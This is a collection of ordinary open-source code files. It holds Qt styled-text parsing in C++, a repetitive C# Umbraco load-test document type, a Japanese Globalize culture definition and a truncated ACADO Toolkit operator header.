image->align = QQuickStyledTextImgTag::Middle;
}
}
} while (!ch->isNull() && !attr.first.isEmpty());
if (preloadImages && !image->size.isValid()) {
// if we don't know its size but the image is a local image,
// we load it in the pixmap cache and save its implicit size
// to avoid a relayout later on.
QUrl url = baseUrl.resolved(image->url);
if (url.isLocalFile()) {
image->pix = new QQuickPixmap(context->engine(), url, image->size);
if (image->pix && image->pix->isReady()) {
image->size = image->pix->implicitSize();
} else {
delete image->pix;
image->pix = 0;
}
}
}
imgWidth = image->size.width();
imgTags->append(image);
} else {
// if we already have a list of img tags for this text
// we only want to update the positions of these tags.
QQuickStyledTextImgTag *image = imgTags->value(nbImages);
image->position = textOut.length() + 1;
imgWidth = image->size.width();
QPair<QStringRef,QStringRef> attr;
do {
attr = parseAttribute(ch, textIn);
} while (!ch->isNull() && !attr.first.isEmpty());
nbImages++;
}
QFontMetricsF fm(layout.font());
QString padding(qFloor(imgWidth / fm.width(QChar::Nbsp)), QChar::Nbsp);
textOut += QLatin1Char(' ');
textOut += padding;
textOut += QLatin1Char(' ');
}
QPair<QStringRef,QStringRef> QQuickStyledTextPrivate::parseAttribute(const QChar *&ch, const QString &textIn)
{
skipSpace(ch);
int attrStart = ch - textIn.constData();
int attrLength = 0;
while (!ch->isNull()) {
if (*ch == greaterThan) {
break;
} else if (*ch == equals) {
++ch;
if (*ch != singleQuote && *ch != doubleQuote) {
while (*ch != greaterThan && !ch->isNull())
++ch;
break;
}
++ch;
if (!attrLength)
break;
QStringRef attr(&textIn, attrStart, attrLength);
QStringRef val = parseValue(ch, textIn);
if (!val.isEmpty())
return QPair<QStringRef,QStringRef>(attr,val);
break;
} else {
++attrLength;
}
++ch;
}
return QPair<QStringRef,QStringRef>();
}
QStringRef QQuickStyledTextPrivate::parseValue(const QChar *&ch, const QString &textIn)
{
int valStart = ch - textIn.constData();
int valLength = 0;
while (*ch != singleQuote && *ch != doubleQuote && !ch->isNull()) {
++valLength;
++ch;
}
if (ch->isNull())
return QStringRef();
++ch; // skip quote
return QStringRef(&textIn, valStart, valLength);
}
QString QQuickStyledTextPrivate::toAlpha(int value, bool upper)
{
const char baseChar = upper ? 'A' : 'a';
QString result;
int c = value;
while (c > 0) {
c--;
result.prepend(QChar(baseChar + (c % 26)));
c /= 26;
}
return result;
}
QString QQuickStyledTextPrivate::toRoman(int value, bool upper)
{
QString result = QLatin1String("?");
// works for up to 4999 items
if (value < 5000) {
QByteArray romanNumeral;
static const char romanSymbolsLower[] = "iiivixxxlxcccdcmmmm";
static const char romanSymbolsUpper[] = "IIIVIXXXLXCCCDCMMMM";
QByteArray romanSymbols;
if (!upper)
romanSymbols = QByteArray::fromRawData(romanSymbolsLower, sizeof(romanSymbolsLower));
else
romanSymbols = QByteArray::fromRawData(romanSymbolsUpper, sizeof(romanSymbolsUpper));
int c[] = { 1, 4, 5, 9, 10, 40, 50, 90, 100, 400, 500, 900, 1000 };
int n = value;
for (int i = 12; i >= 0; n %= c[i], i--) {
int q = n / c[i];
if (q > 0) {
int startDigit = i + (i + 3) / 4;
int numDigits;
if (i % 4) {
if ((i - 2) % 4)
numDigits = 2;
else
numDigits = 1;
}
else
numDigits = q;
romanNumeral.append(romanSymbols.mid(startDigit, numDigits));
}
}
result = QString::fromLatin1(romanNumeral);
}
return result;
}
QT_END_NAMESPACE
| adenexter/qtdeclarative | src/quick/util/qquickstyledtext.cpp | C++ | lgpl-2.1 | 30,038 |
namespace Vega.Test.Entities.DocumentTypes.LoadTest
{
using Vega.USiteBuilder;
using System;
[DocumentType(IconUrl = "doc4.gif",
Thumbnail = "doc.png",
Description = "Decription of FirsteLevelDT",
AllowedTemplates = new string[] { "FirstLevel", "SecondLevel1" },
DefaultTemplate = "SecondLevel1",
AllowedChildNodeTypeOf = new Type[] { typeof(LoadTest1), typeof(LoadTest2), typeof(LoadTest3), typeof(LoadTest4) })]
class LoadTest45 : LoadTest4
{
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propAAA000 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propAAA111 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propAAA222 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propAAA333 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propAAA444 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propAAA555 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propAAA666 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propAAA777 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propAAA888 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propAAA999 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propBBB000 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propBBB111 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propBBB222 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propBBB333 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propBBB444 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propBBB555 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propBBB666 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propBBB777 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propBBB888 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propBBB999 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propCCC000 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propCCC111 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propCCC222 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propCCC333 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propCCC444 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propCCC555 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propCCC666 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propCCC777 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propCCC888 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propCCC999 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propDDD000 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propDDD111 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propDDD222 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propDDD333 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propDDD444 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propDDD555 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propDDD666 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propDDD777 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propDDD888 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propDDD999 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propEEE000 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propEEE111 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propEEE222 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propEEE333 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propEEE444 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propEEE555 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propEEE666 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propEEE777 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propEEE888 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propEEE999 { get; set; }
/////////////////
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondAAA000 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondAAA111 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondAAA222 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondAAA333 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondAAA444 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondAAA555 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondAAA666 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondAAA777 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondAAA888 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondAAA999 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondBBB000 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondBBB111 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondBBB222 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondBBB333 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondBBB444 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondBBB555 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondBBB666 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondBBB777 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondBBB888 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondBBB999 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondCCC000 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondCCC111 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondCCC222 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondCCC333 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondCCC444 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondCCC555 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondCCC666 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondCCC777 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondCCC888 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondCCC999 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondDDD000 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondDDD111 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondDDD222 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondDDD333 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondDDD444 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondDDD555 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondDDD666 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondDDD777 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondDDD888 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondDDD999 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondEEE000 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondEEE111 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondEEE222 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondEEE333 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondEEE444 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondEEE555 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondEEE666 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondEEE777 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondEEE888 { get; set; }
[DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
public string propSecondEEE999 { get; set; }
}
}
| GertyEngrie/uSiteBuilder | source/Vega.Test.Entities/DocumentTypes/LoadTest/LoadTestDT45.cs | C# | lgpl-2.1 | 14,428 |
/*
* Globalize Culture ja-JP
*
* http://github.com/jquery/globalize
*
* Copyright Software Freedom Conservancy, Inc.
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* This file was generated by the Globalize Culture Generator
* Translation: bugs found in this file need to be fixed in the generator
*/
ample.locale.addCultureInfo("ja-JP", "default", {
name: "ja-JP",
englishName: "Japanese (Japan)",
nativeName: "日本語 (日本)",
language: "ja",
numberFormat: {
"NaN": "NaN (非数値)",
negativeInfinity: "-∞",
positiveInfinity: "+∞",
percent: {
pattern: ["-n%","n%"]
},
currency: {
pattern: ["-$n","$n"],
decimals: 0,
symbol: "¥"
}
},
calendars: {
standard: {
days: {
names: ["日曜日","月曜日","火曜日","水曜日","木曜日","金曜日","土曜日"],
namesAbbr: ["日","月","火","水","木","金","土"],
namesShort: ["日","月","火","水","木","金","土"]
},
months: {
names: ["1月","2月","3月","4月","5月","6月","7月","8月","9月","10月","11月","12月",""],
namesAbbr: ["1","2","3","4","5","6","7","8","9","10","11","12",""]
},
AM: ["午前","午前","午前"],
PM: ["午後","午後","午後"],
eras: [{"name":"西暦","start":null,"offset":0}],
patterns: {
d: "yyyy/MM/dd",
D: "yyyy'年'M'月'd'日'",
t: "H:mm",
T: "H:mm:ss",
f: "yyyy'年'M'月'd'日' H:mm",
F: "yyyy'年'M'月'd'日' H:mm:ss",
M: "M'月'd'日'",
Y: "yyyy'年'M'月'"
}
},
Japanese: {
name: "Japanese",
days: {
names: ["日曜日","月曜日","火曜日","水曜日","木曜日","金曜日","土曜日"],
namesAbbr: ["日","月","火","水","木","金","土"],
namesShort: ["日","月","火","水","木","金","土"]
},
months: {
names: ["1月","2月","3月","4月","5月","6月","7月","8月","9月","10月","11月","12月",""],
namesAbbr: ["1","2","3","4","5","6","7","8","9","10","11","12",""]
},
AM: ["午前","午前","午前"],
PM: ["午後","午後","午後"],
eras: [{"name":"平成","start":null,"offset":1867},{"name":"昭和","start":-1812153600000,"offset":1911},{"name":"大正","start":-1357603200000,"offset":1925},{"name":"明治","start":60022080000,"offset":1988}],
twoDigitYearMax: 99,
patterns: {
d: "gg y/M/d",
D: "gg y'年'M'月'd'日'",
t: "H:mm",
T: "H:mm:ss",
f: "gg y'年'M'月'd'日' H:mm",
F: "gg y'年'M'月'd'日' H:mm:ss",
M: "M'月'd'日'",
Y: "gg y'年'M'月'"
}
}
}
});
| zonebuilder/zonebuilder.github.io | jul/ample-sdk/ample/cultures/ja-JP.js | JavaScript | lgpl-3.0 | 2,657 |
/*
* This file is part of ACADO Toolkit.
*
* ACADO Toolkit -- A Toolkit for Automatic Control and Dynamic Optimization.
* Copyright (C) 2008-2014 by Boris Houska, Hans Joachim Ferreau,
* Milan Vukov, Rien Quirynen, KU Leuven.
* Developed within the Optimization in Engineering Center (OPTEC)
* under supervision of Moritz Diehl. All rights reserved.
*
* ACADO Toolkit is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 3 of the License, or (at your option) any later version.
*
* ACADO Toolkit is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with ACADO Toolkit; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/**
* \file include/acado/symbolic_operator/nonsmooth_operator.hpp
* \author Boris Houska, Hans Joachim Ferreau
*/
#ifndef ACADO_TOOLKIT_NONSMOOTH_OPERATOR_HPP
#define ACADO_TOOLKIT_NONSMOOTH_OPERATOR_HPP
#include <acado/symbolic_operator/symbolic_operator_fwd.hpp>
BEGIN_NAMESPACE_ACADO
/**
* \brief Abstract base class for all scalar-valued symbolic operators.
*
* \ingroup BasicDataStructures
*
* The class Operator serves as an abstract base class for all scalar-valued
* symbolic operators.
*
* \author Boris Houska, Hans Joachim Ferreau
*/
class NonsmoothOperator : public Operator{
public:
/** Default constructor. */
NonsmoothOperator();
virtual ~NonsmoothOperator();
/** Sets the argument (note that arg should have dimension 1). */
virtual Operator& operator=( const double & arg );
virtual Operator& operator=( const DVector & arg );
virtual Operator& operator=( const DMatrix & arg );
virtual Operator& operator=( const Expression & arg );
virtual Operator& operator=( const Operator & arg );
Operator& operator+=( const double & arg );
Operator& operator+=( const DVector & arg );
Operator& operator+=( const DMatrix & arg );
Operator& operator+=( const Expression & arg );
Operator& operator-=( const double & arg );
Operator& operator-=( const DVector & arg );
Operator& operator-=( const DMatrix & arg );
Operator& operator-=( const Expression & arg );
Operator& operator*=( const double & arg );
Operator& operator*=( const DVector & arg );
Operator& operator*=( const DMatrix & arg );
Operator& operator*=( const Expression & arg );
Operator& operator/=( const double & arg );
Operator& operator/=( const Expression & arg );
Expression operator+( const double & arg ) const;
Expression operator+( const DVector & arg ) const;
Expression operator+( const DMatrix & arg ) const;
Expression operator+( const Operator& arg ) const;
Expression operator+( const Expression & arg ) const;
Expression operator-( const double & arg ) const;
Expression operator-( const DVector & arg ) const;
Expression operator-( const DMatrix & arg ) const;
Expression operator-( const Operator & arg ) const;
Expression operator-( const Expression & arg ) const;
Expression operator-( ) const;
Expression operator*( const double & arg ) const;
Expression operator*( const DVector & arg ) const;
Expression operator*( const DMatrix & arg ) const;
Expression operator*( const Operator & arg ) const;
Expression operator*( const Expression & arg ) const;
Expression operator/( const double & arg ) const;
Expression operator/( const Operator & arg ) const;
Expression operator/( const Expression & arg ) const;
ConstraintComponent operator<=( const double& ub ) const;
ConstraintComponent operator>=( const double& lb ) const;
ConstraintComponent operator==( const double& b ) const;
ConstraintComponent operator<=( const DVector& ub ) const;
ConstraintComponent operator>=( const DVector& lb ) const;
ConstraintComponent operator==( const DVector& b ) const;
ConstraintComponent operator<=( const VariablesGrid& ub ) const;
ConstraintComponent operator>=( const VariablesGrid& lb ) const;
ConstraintComponent operator==( const VariablesGrid& b ) const;
/** Evaluates the expression and stores the intermediate \n
* results in a buffer (needed for automatic differentiation \n
* in backward mode) \n
* \return SUCCESFUL_RETURN \n
* RET_NAN \n
* */
virtual returnValue evaluate( int number /**< storage position */,
double *x /**< the input variable x */,
double *result /**< the result */ );
/** Evaluates the expression (templated version) */
virtual returnValue evaluate( EvaluationBase *x );
/** Returns the derivative of the expression with respect \n
* to the variable var(index). \n
* \return The expression for the derivative. \n
*
*/
virtual Operator* differentiate( int index /**< diff. index */ );
/** Automatic Differentiation in forward mode on the symbolic \n
* level. This function generates an expression for a \n
* forward derivative \n
* \return SUCCESSFUL_RETURN \n
*/
virtual Operator* AD_forward( int dim , /**< dimension of the seed */
VariableType *varType , /**< the variable types */
int *component, /**< and their components */
Operator **seed , /**< the forward seed */
int &nNewIS , /**< the number of new IS */
TreeProjection ***newIS /**< the new IS-pointer */ );
/** Automatic Differentiation in backward mode on the symbolic \n
* level. This function generates an expression for a \n
* backward derivative \n
* \return SUCCESSFUL_RETURN \n
*/
virtual returnValue AD_backward( int dim , /**< number of directions */
VariableType *varType , /**< the variable types */
int *component, /**< and their components */
Operator *seed , /**< the backward seed */
Operator **df , /**< the result */
int &nNewIS , /**< the number of new IS */
TreeProjection ***newIS /**< the new IS-pointer */ );
/** Automatic Differentiation in symmetric mode on the symbolic \n
* level. This function generates an expression for a \n
* second order derivative. \n
* \return SUCCESSFUL_RETURN \n
*/
virtual returnValue AD_symmetric( int dim , /**< number of directions */
VariableType *varType , /**< the variable types */
int *component , /**< and their components */
Operator *l , /**< the backward seed */
Operator **S , /**< forward seed matrix */
int dimS , /**< dimension of forward seed */
Operator **dfS , /**< first order foward result */
Operator **ldf , /**< first order backward result */
Operator **H , /**< upper trianglular part of the Hessian */
int &nNewLIS , /**< the number of newLIS */
TreeProjection ***newLIS , /**< the new LIS-pointer */
int &nNewSIS , /**< the number of newSIS */
TreeProjection ***newSIS , /**< the new SIS-pointer */
int &nNewHIS , /**< the number of newHIS */
TreeProjection ***newHIS /**< the new HIS-pointer */ );
/** Substitutes var(index) with the expression sub. \n
* \return The substituted expression. \n
*
*/
virtual Operator* substitute( int index /**< subst. index */,
const Operator *sub /**< the substitution*/);
/** Checks whether the expression is zero or one \n
* \return NE_ZERO \n
* NE_ONE \n
* NE_NEITHER_ONE_NOR_ZERO \n
*
*/
virtual NeutralElement isOneOrZero() const;
/** Asks the expression whether it is depending on a certian type of \n
* variable. \n
* \return BT_TRUE if a dependency is detected, \n
* BT_FALSE otherwise. \n
*/
virtual BooleanType isDependingOn( VariableType var ) const;
/** Checks whether the expression is depending on a variable \n
* \return BT_FALSE if no dependence is detected \n
* BT_TRUE otherwise \n
*
*/
virtual BooleanType isDependingOn( int dim , /**< number of directions */
VariableType *varType , /**< the variable types */
int *component, /**< and their components */
BooleanType *implicit_dep /**< implicit dependencies */ );
/** Checks whether the expression is linear in \n
* (or not depending on) a variable \n
* \return BT_FALSE if no linearity is \n
* detected \n
* BT_TRUE otherwise \n
*
*/
virtual BooleanType isLinearIn( int dim , /**< number of directions */
VariableType *varType , /**< the variable types */
int *component, /**< and their components */
BooleanType *implicit_dep /**< implicit dependencies */ );
/** Checks whether the expression is polynomial in \n
* the specified variables \n
* \return BT_FALSE if the expression is not polynomial \n
* BT_TRUE otherwise \n
*
*/
virtual BooleanType isPolynomialIn( int dim , /**< number of directions */
VariableType *varType , /**< the variable types */
int *component, /**< and their components */
BooleanType *implicit_dep /**< implicit dependencies */ );
/** Checks whether the expression is rational in \n
* the specified variables \n
* \return BT_FALSE if the expression is not rational \n
* BT_TRUE otherwise \n
*
*/
virtual BooleanType isRationalIn( int dim , /**< number of directions */
VariableType *varType , /**< the variable types */
int *component, /**< and their components */
BooleanType *implicit_dep /**< implicit dependencies */ );
/** Checks whether the expression is smooth in time \n
* \return BT_FALSE if the expression is not smooth \n
* BT_TRUE otherwise \n
*
*/
virtual BooleanType isSmooth( ) const;
/** Returns the monotonicity of the expression. \n
* \return MT_NONDECREASING \n
* MT_NONINCREASING \n
* MT_NONMONOTONIC \n
*
*/
virtual MonotonicityType getMonotonicity( );
/** Returns the curvature of the expression \n
* \return CT_CONSTANT \n
* CT_AFFINE \n
* CT_CONVEX \n
* CT_CONCAVE \n
*
*/
virtual CurvatureType getCurvature( );
/** Overwrites the monotonicity of the expression. \n
* (For the case that the monotonicity is explicitly known) \n
* \return SUCCESSFUL_RETURN \n
*
*/
virtual returnValue setMonotonicity( MonotonicityType monotonicity_ );
/** Overwrites the curvature of the expression. \n
* (For the case that the curvature is explicitly known) \n
* \return SUCCESSFUL_RETURN \n
*
*/
virtual returnValue setCurvature( CurvatureType curvature_ );
/** Automatic Differentiation in forward mode. \n
* This function stores the intermediate \n
* results in a buffer (needed for 2nd order automatic \n
* differentiation in backward mode) \n
* \return SUCCESFUL_RETURN \n
* RET_NAN \n
*/
virtual returnValue AD_forward( int number /**< storage position */,
double *x /**< The evaluation
point x */,
double *seed /**< the seed */,
double *f /**< the value of the
expression at x */,
double *df /**< the derivative of
the expression */ );
/** Automatic Differentiation in forward mode. \n
* This function uses the intermediate \n
* results from a buffer \n
* \return SUCCESFUL_RETURN \n
* RET_NAN \n
*/
virtual returnValue AD_forward( int number /**< storage position */,
double *seed /**< the seed */,
double *df /**< the derivative of
the expression */ );
// IMPORTANT REMARK FOR AD_BACKWARD: run evaluate first to define
// the point x and to compute f.
/** Automatic Differentiation in backward mode based on \n
* buffered values \n
* \return SUCCESFUL_RETURN \n
* RET_NAN \n
*/
virtual returnValue AD_backward( int number /**< the buffer
position */,
double seed /**< the seed */,
double *df /**< the derivative of
the expression */);
/** Automatic Differentiation in forward mode for \n
* 2nd derivatives. \n
* This function uses intermediate \n
* results from a buffer. \n
* \return SUCCESFUL_RETURN \n
* RET_NAN \n
*/
virtual returnValue AD_forward2( int number /**< the buffer
position */,
double *seed1 /**< the seed */,
double *seed2 /**< the seed for the
first derivative */,
double *df /**< the derivative of
the expression */,
double *ddf /**< the 2nd derivative
of the expression*/);
// IMPORTANT REMARK FOR AD_BACKWARD2: run AD_forward first to define
// the point x and to compute f and df.
/** Automatic Differentiation in backward mode for 2nd order \n
* derivatives based on buffered values. \n
* \return SUCCESFUL_RETURN \n
* RET_NAN \n
*/
virtual returnValue AD_backward2( int number /**< the buffer
position */,
double seed1 /**< the seed1 */,
double seed2 /**< the seed2 */,
double *df /**< the 1st derivative
of the expression */,
double *ddf /**< the 2nd derivative
of the expression */ );
/** Prints the expression into a stream. \n
* \return SUCCESFUL_RETURN \n
*/
virtual std::ostream& print( std::ostream &stream ) const;
/** Provides a deep copy of the expression. \n
* \return a clone of the expression. \n
*/
virtual Operator* clone() const;
/** Provides a deep copy of a tree projection. \n
* \return a clone of the TreeProjection or \n
* an assertion if the type this is \n
* expression is no TreeProjection. \n
*/
virtual TreeProjection* cloneTreeProjection() const;
/** Clears the buffer and resets the buffer size \n
* to 1. \n
* \return SUCCESFUL_RETURN \n
*/
virtual returnValue clearBuffer();
/** Enumerates all variables based on a common \n
* IndexList. \n
* \return SUCCESFUL_RETURN
*/
virtual returnValue enumerateVariables( SymbolicIndexList *indexList );
/** Asks the expression for its name. \n
* \return the name of the expression. \n
*/
virtual OperatorName getName();
/** Asks the variable for its relative index. \n
*/
//virtual int getVariableIndex( ) const;
/** Asks the variable for its global index. \n
*/
virtual int getGlobalIndex( ) const;
/** Asks the expression whether it is a variable. \n
* \return The answer. \n
*/
virtual BooleanType isVariable( VariableType &varType,
int &component ) const;
/** The function loadIndices passes an IndexList through \n
* the whole expression tree. Whenever a variable gets the \n
* IndexList it tries to make an entry. However if a \n
* variable recognices that it has already been added \n
* before it will not be allowed to make a second entry. \n
* Note that all variables, in paticular the intermediate \n
* states, will keep in mind whether they were allowed \n
* to make an entry or not. This guarantees that \n
* intermediate states are never evaluated twice if they \n
* occur at several knots of the tree. \n
* \n
* THIS FUNCTION IS FOR INTERNAL USE ONLY. \n
* \n
